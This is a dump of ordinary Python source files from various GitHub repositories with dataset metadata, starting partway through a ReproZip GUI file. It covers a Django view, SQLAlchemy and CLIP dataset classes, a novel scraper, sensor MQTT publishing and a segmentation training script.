QtGui.QPushButton(\"Browse\")\n browse_pkg.clicked.connect(self._browse_pkg)\n layout.addWidget(browse_pkg, 0, 2)\n\n layout.addWidget(QtGui.QLabel(\"Unpacker:\"), 1, 0,\n QtCore.Qt.AlignTop)\n ulayout = QtGui.QVBoxLayout()\n self.unpackers = QtGui.QButtonGroup()\n for i, name in enumerate(n for n, c in self.UNPACKERS):\n radio = QtGui.QRadioButton(name)\n self.unpackers.addButton(radio, i)\n ulayout.addWidget(radio)\n layout.addLayout(ulayout, 1, 1, 1, 2)\n\n group = QtGui.QGroupBox(title=\"Unpacker options\")\n group_layout = QtGui.QVBoxLayout()\n self.unpacker_options = ResizableStack()\n self.unpackers.buttonClicked[int].connect(\n self.unpacker_options.setCurrentIndex)\n scroll = QtGui.QScrollArea(widgetResizable=True)\n scroll.setWidget(self.unpacker_options)\n group_layout.addWidget(scroll)\n group.setLayout(group_layout)\n layout.addWidget(group, 2, 0, 1, 3)\n layout.setRowStretch(2, 1)\n\n for i, (name, WidgetClass) in enumerate(self.UNPACKERS):\n widget = WidgetClass()\n self.unpacker_options.addWidget(widget)\n\n self.unpacker_options.addWidget(QtGui.QLabel(\"Select an unpacker to \"\n \"display options...\"))\n self.unpacker_options.setCurrentIndex(len(self.UNPACKERS))\n\n layout.addWidget(QtGui.QLabel(\"Destination directory:\"), 3, 0)\n self.directory_widget = QtGui.QLineEdit()\n self.directory_widget.editingFinished.connect(self._directory_changed)\n layout.addWidget(self.directory_widget, 3, 1)\n browse_dir = QtGui.QPushButton(\"Browse\")\n browse_dir.clicked.connect(self._browse_dir)\n layout.addWidget(browse_dir, 3, 2)\n\n buttons = QtGui.QHBoxLayout()\n buttons.addStretch(1)\n self.unpack_widget = QtGui.QPushButton(\"Unpack experiment\",\n enabled=False)\n self.unpack_widget.clicked.connect(self._unpack)\n buttons.addWidget(self.unpack_widget)\n layout.addLayout(buttons, 4, 0, 1, 3)\n\n self.setLayout(layout)\n\n self._package_changed()\n\n def _browse_pkg(self):\n picked = QtGui.QFileDialog.getOpenFileName(\n self, \"Pick package file\",\n QtCore.QDir.currentPath(), \"ReproZip Packages (*.rpz)\")\n if picked:\n self.package_widget.setText(picked)\n self._package_changed()\n\n def _package_changed(self, new_pkg=None):\n package = self.package_widget.text()\n if package.lower().endswith('.rpz'):\n self.directory_widget.setText(package[:-4])\n self._directory_changed()\n\n def _browse_dir(self):\n picked = QtGui.QFileDialog.getSaveFileName(\n self, \"Pick directory\",\n QtCore.QDir.currentPath())\n if picked:\n if os.path.exists(picked):\n error_msg(self, \"This directory already exists\", 'warning')\n else:\n self.directory_widget.setText(picked)\n self._directory_changed()\n\n def _directory_changed(self, new_dir=None):\n self.unpack_widget.setEnabled(bool(self.directory_widget.text()))\n\n def _unpack(self):\n directory = self.directory_widget.text()\n if not directory:\n return\n unpacker = self.unpackers.checkedButton()\n if unpacker:\n options = self.unpacker_options.currentWidget().options()\n if options is None:\n return\n if handle_error(self, reprounzip.unpack(\n self.package_widget.text(),\n unpacker.text(),\n directory,\n options)):\n self.unpacked.emit(os.path.abspath(directory),\n options.get('root'))\n else:\n error_msg(self, \"No unpacker selected\", 
'warning')\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/ViDA-NYU_reprozip/reprozip-master/reprounzip-qt/reprounzip_qt/gui/unpack.py","file_name":"unpack.py","file_ext":"py","file_size_in_byte":10073,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"38566737522","text":"import os\nfrom os import path\nimport pandas as pd \nimport clip \nfrom torch.utils.data.dataset import Dataset\n\nclass DescriptionDataset(Dataset):\n \"\"\"\n \"\"\"\n\n def __init__(self, name = 'trecvid', root = None, subset = 'train'):\n self.root = root\n self.subset = subset \n self.short_text_descriptions = path.join(root, f'{subset}_text_descriptions.csv') \n \n desc_csv = pd.read_csv(self.short_text_descriptions) \n \n self.description = []\n self.videos = set()\n for i, row in desc_csv.iterrows():\n vid_id = str(row['video_id']).zfill(5)\n self.videos.add(vid_id)\n try:\n curr_description = row['description'] \n \n if len(curr_description) > 70:\n curr_description = ' '.join(curr_description.split()[:70])\n self.description.append({\n \"description\": clip.tokenize(curr_description)[0] ,\n \"video_id\": int(vid_id)\n })\n except:\n pass \n for i in range(10):\n try:\n curr_description = row[f'description_{i}'] \n if len(curr_description) > 70:\n curr_description = ' '.join(curr_description.split()[:70])\n \n self.description.append({\n \"description\": clip.tokenize(curr_description)[0] ,\n \"video_id\": int(vid_id)\n })\n except:\n pass\n \n print('%d descriptions of %d videos accepted in %s.' % (len(self.description), len(self.videos), self.root))\n \n def __getitem__(self, idx):\n return self.description[idx]\n\n def __len__(self):\n return len(self.description)","repo_name":"nhatkhtn/Image-Retrieval-Backend","sub_path":"mysite/myapp/VideoRetrieval/datasets/description.py","file_name":"description.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37981361241","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import User\nfrom .models import Attention\nfrom .models import Studio\nfrom . 
import MyUtils\nimport simplejson\nfrom django.views.decorators.csrf import csrf_exempt\n\n@csrf_exempt\ndef attention(request):\n    username = request.POST['username']\n    try:\n        obj = User.objects.filter(username=username).values('isTea')\n        # if obj[0]['isTea'] == False:\n        attObj = Attention.objects.filter(username=username).values('teachername')  # teachers this user follows\n        stuObj = Studio.objects.filter(isstream=True).values('teachername')  # teachers currently streaming\n        teaidList = []\n        for i in stuObj:\n            teaidList.append(i['teachername'])\n        resList = []\n        for value1 in attObj:\n            if value1['teachername'] in teaidList:\n                # resList.append({value1['teachername']: True})\n                tempDict = {}\n                tempDict['name'] = value1['teachername']\n                tempDict['type'] = True\n                # look up the teacher's avatar\n                objImg = User.objects.filter(username=value1['teachername']).values('imgpath')\n                if len(objImg) > 0:\n                    tempDict['imgpath'] = objImg[0]['imgpath']\n                else:\n                    tempDict['imgpath'] = None\n                resList.append(tempDict)\n            else:\n                # resList.append({value1['teachername']: False})\n                tempDict = {}\n                tempDict['name'] = value1['teachername']\n                tempDict['type'] = False\n                objImg = User.objects.filter(username=value1['teachername']).values('imgpath')\n                if len(objImg) > 0:\n                    tempDict['imgpath'] = objImg[0]['imgpath']\n                else:\n                    tempDict['imgpath'] = None\n                resList.append(tempDict)\n        returnDict = {\n            'success': True,\n            'list': resList\n        }\n        return HttpResponse(simplejson.dumps(returnDict), content_type=\"application/json\")\n    except Exception:\n        return HttpResponse(simplejson.dumps({'success': False}), content_type=\"application/json\")\n","repo_name":"jishic/webcase","sub_path":"qiusuo/backend/viewAttention.py","file_name":"viewAttention.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"69808141172","text":"#!/usr/bin/python3\n\"\"\"class definition of a City and an instance Base = declarative_base()\"\"\"\nfrom sqlalchemy import ForeignKey, Integer, String, Column\nfrom relationship_state import Base, State\nfrom sqlalchemy.orm import relationship\n\n\nclass City(Base):\n    \"\"\"cities class\"\"\"\n    __tablename__ = 'cities'\n\n    id = Column(Integer, primary_key=True)\n    name = Column(String(128), nullable=False)\n    state_id = Column(Integer, ForeignKey('states.id'), nullable=False)\n\n    def __repr__(self):\n        return (\"<City: %s, %s, %s>\"\n                % (self.id, self.name, self.state_id))\n","repo_name":"gjdame/holbertonschool-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/relationship_city.py","file_name":"relationship_city.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"20401517140","text":"import m8r\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# VP\nvp_rsf = m8r.Input('../vp.rsf')\nvp = np.array(vp_rsf[:]).reshape(vp_rsf.int('n2'), vp_rsf.int('n1')).T\n\n# Ifull\ni_rsf = m8r.Input('isum.rsf')\ni = np.array(i_rsf[:]).reshape(i_rsf.int('n2'), i_rsf.int('n1')).T\n\n# Iup\ni_rsf = m8r.Input('iupsum.rsf')\niup = np.array(i_rsf[:]).reshape(i_rsf.int('n2'), i_rsf.int('n1')).T\n\n\n# Inofs\ni_rsf = m8r.Input('i_nofssum.rsf')\ninofs = np.array(i_rsf[:]).reshape(i_rsf.int('n2'), i_rsf.int('n1')).T\n\n# Inosea\ni_rsf = m8r.Input('i_noseasum.rsf')\ninosea = np.array(i_rsf[:]).reshape(i_rsf.int('n2'), i_rsf.int('n1')).T\n\n# Imdd\ni_rsf = m8r.Input('imddsum.rsf')\nimdd = np.array(i_rsf[:]).reshape(i_rsf.int('n2'), i_rsf.int('n1')).T\n\n# Isgd\ni_rsf = m8r.Input('isgdsum.rsf')\nisgd = 
np.array(i_rsf[:]).reshape(i_rsf.int('n2'), i_rsf.int('n1')).T\n\nplt.figure(figsize=(10,5))\nplt.imshow(i, cmap='gray', interpolation=None)\nplt.show()\n\nnp.savez('images', vp=vp, i=i, iup=iup, inofs=inofs, inosea=inosea, imdd=imdd, isgd=isgd)\n","repo_name":"DIG-Kaust/VolveSynthetic","sub_path":"Imaging/saveimages.py","file_name":"saveimages.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"24079519172","text":"\nimport torch\nimport torch.nn as nn\nfrom torch.backends import cudnn\ncudnn.enabled = True\nfrom torch.utils.data import DataLoader\nimport torch.nn.functional as F\n\nimport importlib\n\nimport voc12.dataloader\nfrom misc import pyutils, imutils\n\nimport numpy as np\nfrom chainercv.datasets import VOCSemanticSegmentationDataset\nfrom chainercv.evaluations import calc_semantic_segmentation_confusion\nfrom tqdm import tqdm\nfrom PIL import Image\n\n\ndef balanced_cross_entropy(logits, labels, one_hot_labels):\n \"\"\"\n :param logits: shape: (N, C)\n :param labels: shape: (N, C)\n :param reduction: options: \"none\", \"mean\", \"sum\"\n :return: loss or losses\n \"\"\"\n\n N, C, H, W = logits.shape\n\n assert one_hot_labels.size(0) == N and one_hot_labels.size(1) == C, f'label tensor shape is {one_hot_labels.shape}, while logits tensor shape is {logits.shape}'\n\n log_logits = F.log_softmax(logits, dim=1)\n loss_structure = -torch.sum(log_logits * one_hot_labels, dim=1) # (N)\n\n ignore_mask_bg = torch.zeros_like(labels)\n ignore_mask_fg = torch.zeros_like(labels)\n \n ignore_mask_bg[labels == 0] = 1\n ignore_mask_fg[(labels != 0) & (labels != 255)] = 1\n \n loss_bg = (loss_structure * ignore_mask_bg).sum() / ignore_mask_bg.sum()\n loss_fg = (loss_structure * ignore_mask_fg).sum() / ignore_mask_fg.sum()\n\n return (loss_bg+loss_fg)/2\n\n\ndef resize_labels(labels, size):\n \"\"\"\n Downsample labels for 0.5x and 0.75x logits by nearest interpolation.\n Other nearest methods result in misaligned labels.\n -> F.interpolate(labels, shape, mode='nearest')\n -> cv2.resize(labels, shape, interpolation=cv2.INTER_NEAREST)\n \"\"\"\n new_labels = []\n for label in labels:\n label = label.float().numpy()\n label = Image.fromarray(label).resize(size, resample=Image.NEAREST)\n new_labels.append(np.asarray(label))\n new_labels = torch.LongTensor(new_labels)\n return new_labels\n\n\ndef run(args):\n\n model = getattr(importlib.import_module(args.amn_network), 'Net')()\n\n train_dataset = voc12.dataloader.VOC12SegmentationDataset(args.train_list,\n label_dir=args.ir_label_out_dir,\n voc12_root=args.voc12_root,\n hor_flip=True,\n crop_size=args.amn_crop_size,\n crop_method=\"random\",\n rescale=(0.5, 1.5)\n )\n\n train_data_loader = DataLoader(train_dataset, batch_size=args.amn_batch_size,\n shuffle=True, num_workers=args.num_workers, pin_memory=True, drop_last=True)\n\n val_dataset = voc12.dataloader.VOC12SegmentationDataset(args.infer_list,\n label_dir=args.ir_label_out_dir,\n voc12_root=args.voc12_root,\n crop_size=None,\n crop_method=\"none\",\n )\n\n val_data_loader = DataLoader(val_dataset, batch_size=1,\n shuffle=False, num_workers=args.num_workers, pin_memory=True, drop_last=False)\n\n param_groups = model.trainable_parameters()\n\n optimizer = torch.optim.Adam(\n params=[\n {\n 'params': param_groups[0],\n 'lr': 5e-06,\n 'weight_decay': 1.0e-4,\n },\n {\n 'params': param_groups[1],\n 'lr': 1e-04,\n 'weight_decay': 1.0e-4,\n },\n ],\n )\n\n total_epochs = args.amn_num_epoches\n\n 
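An aside, not part of the dataset record above: the balanced_cross_entropy helper defined a few lines up in this file can be sanity-checked on toy tensors before it is used in the training loop. A minimal CPU sketch (all shapes, the eps value, and the label layout are invented for illustration; 255 marks ignored pixels and 0 marks background, mirroring the masks built inside the function):

import torch

N, C, H, W = 2, 3, 4, 4
logits = torch.randn(N, C, H, W)

labels = torch.zeros(N, H, W, dtype=torch.long)
labels[:, 2:, :] = 1           # some foreground pixels
labels[0, 0, 0] = 255          # one ignored pixel

# soft one-hot targets, built the same eps-smoothed way as in run()
eps = 0.1
one_hot = torch.full((N, C, H, W), eps / (C - 1))
safe = labels.clone()
safe[labels == 255] = 0        # scatter needs valid class indices
one_hot.scatter_(1, safe.unsqueeze(1), 1 - eps)

loss = balanced_cross_entropy(logits, labels, one_hot)
print(loss.item())             # a finite scalar: mean of bg and fg losses

Note the toy labels deliberately contain both background and foreground pixels; if either mask were empty, the function's per-class normalization would divide by zero.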
model = torch.nn.DataParallel(model).cuda()\n\n model.train()\n\n avg_meter = pyutils.AverageMeter()\n \n for ep in range(total_epochs):\n loader_iter = iter(train_data_loader)\n\n pbar = tqdm(\n range(1, len(train_data_loader) + 1),\n total=len(train_data_loader),\n dynamic_ncols=True,\n )\n\n for iteration, _ in enumerate(pbar):\n optimizer.zero_grad()\n try:\n pack = next(loader_iter)\n except:\n loader_iter = iter(train_data_loader)\n pack = next(loader_iter)\n\n img = pack['img'].cuda(non_blocking=True)\n label_amn = pack['label'].long().cuda(non_blocking=True)\n label_cls = pack['label_cls'].cuda(non_blocking=True)\n\n logit = model(img, label_cls)\n\n B, C, H, W = logit.shape\n\n label_amn = resize_labels(label_amn.cpu(), size=logit.shape[-2:]).cuda()\n\n label_ = label_amn.clone()\n label_[label_amn == 255] = 0\n\n given_labels = torch.full(size=(B, C, H, W), fill_value=args.eps/(C-1)).cuda()\n given_labels.scatter_(dim=1, index=torch.unsqueeze(label_, dim=1), value=1-args.eps)\n\n loss_pcl = balanced_cross_entropy(logit, label_amn, given_labels)\n\n loss = loss_pcl\n loss.backward()\n\n optimizer.step()\n\n avg_meter.add({'loss_pcl': loss_pcl.item()})\n\n pbar.set_description(f\"[{ep + 1}/{total_epochs}] \"\n f\"PCL: [{avg_meter.pop('loss_pcl'):.4f}]\")\n \n with torch.no_grad():\n model.eval()\n dataset = VOCSemanticSegmentationDataset(split=args.chainer_eval_set, data_dir=args.voc12_root)\n labels = []\n preds = []\n\n for i, pack in enumerate(tqdm(val_data_loader)):\n\n img_name = pack['name'][0]\n img = pack['img']\n label_cls = pack['label_cls'][0]\n\n img = img.cuda()\n\n logit = model(img, pack['label_cls'].cuda())\n\n size = img.shape[-2:]\n strided_up_size = imutils.get_strided_up_size(size, 16)\n\n valid_cat = torch.nonzero(label_cls)[:, 0]\n keys = np.pad(valid_cat + 1, (1, 0), mode='constant')\n\n logit_up = F.interpolate(logit, strided_up_size, mode='bilinear', align_corners=False)\n logit_up = logit_up[0, :, :size[0], :size[1]]\n\n logit_up = F.softmax(logit_up, dim=0)[keys].cpu().numpy()\n\n cls_labels = np.argmax(logit_up, axis=0)\n cls_labels = keys[cls_labels]\n\n preds.append(cls_labels.copy())\n\n gt_label = dataset.get_example_by_keys(i, (1,))[0]\n\n labels.append(gt_label.copy())\n\n confusion = calc_semantic_segmentation_confusion(preds, labels)\n\n gtj = confusion.sum(axis=1)\n resj = confusion.sum(axis=0)\n gtjresj = np.diag(confusion)\n denominator = gtj + resj - gtjresj\n iou = gtjresj / denominator\n\n print(f'[{ep + 1}/{total_epochs}] miou: {np.nanmean(iou):.4f}')\n\n model.train()\n\n torch.save(model.module.state_dict(), args.amn_weights_name + '.pth')\n torch.cuda.empty_cache()","repo_name":"gaviotas/AMN","sub_path":"step/train_amn.py","file_name":"train_amn.py","file_ext":"py","file_size_in_byte":7319,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"21"} +{"seq_id":"4734039852","text":"n = int(input())\ndp = [0] * (n + 1) #dp = [0 for _ in range(n + 1)]로 리스트컴프리헨션으로 만들 수 있음을 계속 상기할 것!\n\nif n <= 3:\n print(n)\nelse:\n dp[1] = 1\n dp[2] = 2\n for i in range(3, n + 1):\n dp[i] = dp[i - 1] + dp[i - 2]\n print(dp[i] % 10007)","repo_name":"whdjh/python","sub_path":"Baekjoon/2.기초/11726_2xn타일링.py","file_name":"11726_2xn타일링.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71651912374","text":"import json\nimport posixpath\nimport os\nfrom mkdocs.structure.files import Files\nfrom mkdocs.config.defaults 
import MkDocsConfig\n\ndef list_existing_pages(config: MkDocsConfig, files: Files):\n pages = []\n output_dir = config['site_dir']\n for file in files:\n if file.is_documentation_page() or file.is_media_file():\n pages.append({\n 'src_uri' : file.src_path,\n 'dest_uri' : file.url,\n 'name': file.name,\n 'url' : file.url,\n })\n with open(posixpath.join(output_dir, 'search', 'all_files.json'), 'w', encoding=\"UTF-8\") as f:\n json.dump(pages, f, indent=4)\n\ndef on_files(files: Files, config: MkDocsConfig):\n if not (posixpath.exists(posixpath.join(config['site_dir'], 'search'))):\n os.makedirs(posixpath.join(config['site_dir'], 'search'))\n list_existing_pages(config, files)\n return files\n\n","repo_name":"ObsidianPublisher/template-gh-pages","sub_path":"overrides/hooks/on_files.py","file_name":"on_files.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":118,"dataset":"github-code","pt":"21"} +{"seq_id":"32086202121","text":"from novels.core.epub_core import *\n\ncss_data = '''h1,h2{text-align: center}\np{text-indent: 2em}'''\n\nclass Qin():\n\n def __init__(self, url, max_retries=3):\n\n # self.variables\n self.url = url\n self.book_page_check()\n self.driver = set_driver()\n for retries in range(max_retries):\n self.driver.get(url)\n wait_loading(self.driver)\n self.soup = BeautifulSoup(self.driver.page_source, \"html.parser\")\n break\n\n def book_page_check(self):\n if re.search('/book/', self.url):\n self.book_check = True\n else:\n self.book_check = False\n\n# Book\n\n def get_book_info(self):\n self.book_title = self.soup.find(class_='book_name flex_shrink').text\n try:\n self.cover_src = urljoin(self.url, self.soup.find(class_='book_info').find('img').get('src'))\n except:\n self.cover_src = ''\n\n def get_url_list(self):\n list = []\n a_list = self.soup.find_all(class_='site_box')[1].find_all('a')\n for a in a_list:\n link = urljoin(self.url, a.get('href'))\n if re.search('/read/', link) and link not in [item[0] for item in list]:\n list.append(link)\n self.url_list = [(link, '', '') for link in list]\n return self.url_list\n\n# Page\n\n # Get Page Content\n def get_page_content(self, url, wrong_max=50, next_page_check = True):\n print(url)\n wrong_times = 0\n while True:\n try:\n self.driver.get(url)\n wait_loading(self.driver)\n resources = self.driver.page_source\n soup = BeautifulSoup(resources, \"html.parser\")\n result = soup.find(id='chapter_content')\n title = soup.find(class_='title').find('h3').text\n print(title)\n content = str(result)\n print(content[0:300])\n images = result.find_all('img')\n image_srcs = []\n for image in images:\n image_src = image.get('src')\n if image_src not in image_srcs:\n image_srcs.append(image_src)\n\n # Try next page\n while next_page_check:\n print('Next Page.')\n resources = self.driver.page_source\n soup = BeautifulSoup(resources, \"html.parser\")\n result = soup.find(id='chapter_content')\n print(str(result)[:300])\n content = content +'\\n'+ str(result)\n images = result.find_all('img')\n for image in images:\n image_src = image.get('src')\n if image_src not in image_srcs:\n image_srcs.append(image_src)\n next_page_check = next_page(self.driver, '//a[text()=\"下一页\"]')\n return (title, content, image_srcs)\n\n except Exception as e:\n print(e)\n wrong_times += 1\n time.sleep(1)\n if wrong_times >= wrong_max:\n break\n else:\n print('Try again.')\n pass\n\n\n def get_page_title(self):\n self.page_title = self.soup.find('h1').text\n\n # Quit Driver\n def quit(self):\n 
self.driver.quit()\n\n # Check next page\n def nextPage(self, link_text):\n try:\n next_page = self.driver.find_element_by_link_text(link_text)\n next_page.click()\n wait_loading(self.driver)\n return True\n except:\n return False\n","repo_name":"mk2016a/LightNovels","sub_path":"novels/core/epub_qin.py","file_name":"epub_qin.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34230433229","text":"from brownie import accounts, SimpleStorage\r\nfrom scripts.deploy import deploy_simple_storage\r\n\r\ndef test_can_set_number():\r\n # Arrange\r\n account = accounts[0]\r\n simple_storage = SimpleStorage.deploy({\"from\": account})\r\n expected = 777\r\n\r\n # Act \r\n tx = simple_storage.setNumber(expected, {\"from\": account})\r\n tx.wait(1)\r\n\r\n # Assert \r\n assert simple_storage.number() == expected\r\n\r\ndef test_dummy():\r\n assert True","repo_name":"pinalikefruit/Hackathon-Chainlink-Spring-2022","sub_path":"Brownie/tests/unit/test_simple_storage.py","file_name":"test_simple_storage.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"60097602","text":"import os\n\n\nos.chdir('Downloads/Prueba')\nfiles = os.listdir()\n#print(files)\n#print(os.getcwd())\nnew_names = []\nfor file in files:\n new_file = ''\n file = file.split('-')\n new_file = file[0]\n for idx, splited in enumerate(file):\n if idx == len(file)-1:\n break\n if idx != 0:\n new_file = new_file + '-' + splited\n \n \n \n print(new_file)\n new_names.append(new_file+'.mp3')\n\nfor idx, file in enumerate(new_names):\n print(new_names)\n os.rename(files[idx], new_names[idx])","repo_name":"MauricioD13/Python-programs","sub_path":"Music/title.py","file_name":"title.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"982552575","text":"# coding: utf8\n\nfrom Autodesk.Revit import Exceptions\nfrom Autodesk.Revit.DB import InsulationLiningBase, Document, FamilyInstance\nfrom Autodesk.Revit.UI.Selection import ISelectionFilter, ObjectType\n\nfrom pyrevit import script, forms, revit\nfrom pyrevitmep.meputils import get_connector_closest_to, get_connector_manager\n\n__doc__ = \"\"\"Create a MEP transition between 2 open ends.\nSelect first object (pick a location close to the desired connector)\nSelect second object (pick a location close to the desired connector)\"\"\"\n__title__ = \"Transition\"\n__author__ = \"Cyril Waechter\"\n\nlogger = script.get_logger()\nuidoc = __revit__.ActiveUIDocument\ndoc = __revit__.ActiveUIDocument.Document # type: Document\n\n\nclass NoInsulation(ISelectionFilter):\n def AllowElement(self, elem):\n if isinstance(elem, InsulationLiningBase):\n return False\n try:\n get_connector_manager(elem)\n return True\n except AttributeError:\n return False\n\n def AllowReference(self, reference, position):\n return True\n\n\nclass NoInsulationNoFamilyInstance(ISelectionFilter):\n def AllowElement(self, elem):\n if isinstance(elem, InsulationLiningBase) or isinstance(elem, FamilyInstance):\n return False\n try:\n get_connector_manager(elem)\n return True\n except AttributeError:\n return False\n\n def AllowReference(self, reference, position):\n return True\n\n\ndef new_transition():\n # Prompt user to select elements and points to connect\n try:\n message = \"Pick element 1 (the connector moves depending on 
transition length)\"\n with forms.WarningBar(title=message):\n reference = uidoc.Selection.PickObject(\n ObjectType.Element, NoInsulationNoFamilyInstance(), message\n )\n except Exceptions.OperationCanceledException:\n return False\n\n try:\n element1 = doc.GetElement(reference)\n xyz1 = reference.GlobalPoint\n\n message = \"Pick element 2 (static)\"\n with forms.WarningBar(title=message):\n reference = uidoc.Selection.PickObject(\n ObjectType.Element, NoInsulation(), message\n )\n element2 = doc.GetElement(reference)\n xyz2 = reference.GlobalPoint\n except Exceptions.OperationCanceledException:\n return True\n\n # Get associated unused connectors\n connector1 = get_connector_closest_to(\n get_connector_manager(element1).UnusedConnectors, xyz1\n )\n connector2 = get_connector_closest_to(\n get_connector_manager(element2).UnusedConnectors, xyz2\n )\n\n try:\n if connector1.Domain != connector2.Domain:\n forms.alert(\n \"You picked 2 connectors of different domain. Please retry.\",\n title=\"Domain Error\",\n )\n return True\n except AttributeError:\n forms.alert(\n \"It looks like one of the objects have no unused connector\",\n title=\"AttributeError\",\n )\n return True\n\n if not connector1 and not connector2:\n forms.alert(\n \"It looks like one of the objects have no unused connector\",\n title=\"AttributeError\",\n )\n return True\n\n with revit.Transaction(\"Create transition\"):\n try:\n doc.Create.NewTransitionFitting(connector1, connector2)\n except Exceptions.InvalidOperationException:\n cmd_link1_msg = \"Show exemple image\"\n result = forms.alert(\n \"Unable to connect.\",\n sub_msg=\"Make sure you click near connectors you want to make a transition between.\",\n options=[cmd_link1_msg]\n )\n if result == cmd_link1_msg:\n import os; os.startfile(os.path.join(__commandpath__, \"WhereToClick.png\"))\n return True\n\n\nwhile new_transition():\n pass\n","repo_name":"CyrilWaechter/pyRevitMEP","sub_path":"pyRevitMEP.tab/Create.panel/Transition.pushbutton/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":3902,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"21"} +{"seq_id":"73452567731","text":"from mpu6050 import mpu6050\nfrom time import sleep\nimport paho.mqtt.client as mqtt\n\nbrokerIp = \"192.168.86.77\" #LAN\naccelerometerXTopic = \"accelerometerX\"\naccelerometerYTopic = \"accelerometerY\"\naccelerometerZTopic = \"accelerometerZ\"\ngyroscopeXTopic = \"gyroscopeX\"\ngyroscopeYTopic = \"gyroscopeY\"\ngyroscopeZTopic = \"gyroscopeZ\"\n\nsensor = mpu6050(0x68)\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n\ndef on_message(client, userdata, msg):\n print(\"msg received\")\n\nclient = mqtt.Client(client_id=\"5\", clean_session=False)\nclient.on_connect = on_connect\nclient.on_message = on_message\n\nclient.connect(brokerIp, 1883, 60)\n\nclient.loop_start()\n\nwhile True:\n accel_data = sensor.get_accel_data()\n gyro_data = sensor.get_gyro_data()\n\n# print(\"Accelerometer data\")\n# print(\"x: \" + str(accel_data['x']))\n# print(\"y: \" + str(accel_data['y']))\n# print(\"z: \" + str(accel_data['z']))\n\n client.publish(accelerometerXTopic, payload=accel_data['x'], qos=0, retain=False)\n# client.publish(accelerometerYTopic, payload=accel_data['y'], qos=0, retain=False)\n# client.publish(accelerometerZTopic, payload=accel_data['z'], qos=0, retain=False)\n\n# print(\"Gyroscope data\")\n# print(\"x: \" + str(gyro_data['x']))\n# print(\"y: \" + str(gyro_data['y']))\n# 
print(\"z: \" + str(gyro_data['z']))\n\n# client.publish(gyroscopeXTopic, payload=gyro_data['x'], qos=0, retain=False)\n# client.publish(gyroscopeYTopic, payload=gyro_data['y'], qos=0, retain=False)\n# client.publish(gyroscopeZTopic, payload=gyro_data['z'], qos=0, retain=False)\n\n sleep(0.01)\n\n","repo_name":"LeonardoFalcon/hw4","sub_path":"rpi/doorDetection.py","file_name":"doorDetection.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"44249055778","text":"import argparse\nimport os\nimport torch\n\nclass BaseOptions():\n def __init__(self):\n self.initialized = False\n\n def initialize(self, parser):\n parser.add_argument('--scaled_width', type=int, default=1248, help='input width of the model')\n parser.add_argument('--scaled_height', type=int, default=384, help='input height of the model')\n parser.add_argument('--name', type=str, default='experiment_name', help='name of the experiment')\n parser.add_argument('--dataset', type=str, default='roadlanemark', help='chooses which dataset to load.')\n parser.add_argument('--num_classes', type=int, help='number of labels')\n parser.add_argument('--backbone', type=str, default='resnet34', help='choose the backbone for semantic segmentation')\n parser.add_argument('--pretrained', type=str, help='pretrained model path (.ckpt or .pth)')\n parser.add_argument('--num_threads', default=8, type=int, help='# threads for loading data')\n parser.add_argument('--seed', type=int, default=0, help='seed for random generators')\n parser.add_argument('--use_ocr', action='store_true', help='apply OCR')\n\n parser.add_argument('--normalization', default='imagenet', help='normalization type: imagenet, default (1/255)')\n parser.add_argument('--val_root', required=False, help='root folder containing images for validation')\n parser.add_argument('--val_list', required=False, help='.txt file containing validation image list')\n\n\n parser.add_argument('--save_dir', type=str, default='./checkpoints', help='where checkpoints and log are save. The final saved dir would be: //version_<0,1,2...>/')\n parser.add_argument('--batch_size', type=int, default=2, help='input batch size')\n\n # Distributed\n parser.add_argument('--gpus', type=str, default='0', help='gpu ids for training, testing. e.g. 
0 or 0,1,2')\n        parser.add_argument('--accelerator', type=str, default='ddp', help='DataParallel (dp), DistributedDataParallel (ddp)')\n        self.initialized = True\n        return parser\n\n    def gather_options(self):\n        # initialize parser with basic options\n        if not self.initialized:\n            parser = argparse.ArgumentParser(\n                formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n            parser = self.initialize(parser)\n\n        # get the basic options\n        opt, _ = parser.parse_known_args()\n\n        self.parser = parser\n\n        return parser.parse_args()\n\n    def print_options(self, opt):\n        message = ''\n        message += '----------------- Options ---------------\\n'\n        for k, v in sorted(vars(opt).items()):\n            comment = ''\n            default = self.parser.get_default(k)\n            if v != default:\n                comment = '\\t[default: %s]' % str(default)\n            message += '{:>25}: {:<30}{}\\n'.format(str(k), str(v), comment)\n        message += '----------------- End -------------------'\n        print(message)\n\n        # save to the disk\n        # expr_dir = os.path.join(opt.checkpoints_dir, opt.name)\n        # util.mkdirs(expr_dir)\n        # file_name = os.path.join(expr_dir, 'opt.txt')\n        # with open(file_name, 'wt') as opt_file:\n        #     opt_file.write(message)\n        #     